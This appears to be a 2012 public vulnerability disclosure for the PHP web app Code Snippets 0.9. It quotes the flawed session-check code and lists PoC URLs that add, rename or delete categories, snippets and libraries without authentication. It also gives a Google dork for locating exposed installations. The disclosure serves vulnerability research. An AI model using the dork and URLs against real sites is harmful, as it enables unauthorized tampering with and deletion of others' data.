Code Snippets 0.9 Insecure Session

`# --------------------------------------- #  
Author : L3b-r1'z  
Title : Code Snippets Version 0,9 insecure session  
Date : 6/30/2012  
Email : [email protected]  
Site : Sec4Ever.com & Exploit4arab.com  
Google Dork : allintext: "Powered by: PHP-CSL V0.9"  
Version : 1.1.0  
[ 6/30/2012 ] - Vulnerability discovered  
[ 6/30/2012 ] - Vendor Contacted But No Response.  
[ 6/30/2012 ] - Public disclosure  
# --------------------------------------- #  
This PoC was written for educational purpose. Use it at your own risk.  
Author will be not responsible for any damage.  
# --------------------------------------- #  
1) Bug  
2) PoC  
# --------------------------------------- #  
2) Bug :  
  
Look to file named config in line (120) to (138)  
  
  
if(!session_is_registered('phpcsl') &&  
!isset($_GET['login']) && isset($_GET['act'])) {  
  
if(!$_GET['act'] == "session") {  
$ur = "index.php?login=y&q=".base64_encode(querystr());  
header("Location: $ur");  
}  
}  
  
  
// build URL querystring  
function querystr() {  
global $HTTP_GET_VARS;  
$q = "";  
foreach($HTTP_GET_VARS as $n => $m) {  
$q .= "$n=$m&";  
}  
return $q;  
}  
  
Here the file just secured the login page  
but not secured the add snip or edit or delete  
thats mean an attacker can add snippets or edit or delete or add category  
:D  
# --------------------------------------- #  
3) PoC :  
http://localhost/codesnippets/index.php?op=cats&act=add - Add new Category  
http://localhost/codesnippets/index.php?op=snips&act=add - Add new snippets  
http://localhost/codesnippets/index.php?op=cats&act=edit - rename category  
http://localhost/codesnippets/index.php?op=cats&act=delete - delete category  
http://localhost/codesnippets/index.php?op=lib&act=add - add new library  
http://localhost/codesnippets/index.php?op=lib&act=edit - rename library  
http://localhost/codesnippets/index.php?op=lib&act=delete - delete library  
# --------------------------------------- #  
<< EOF  
`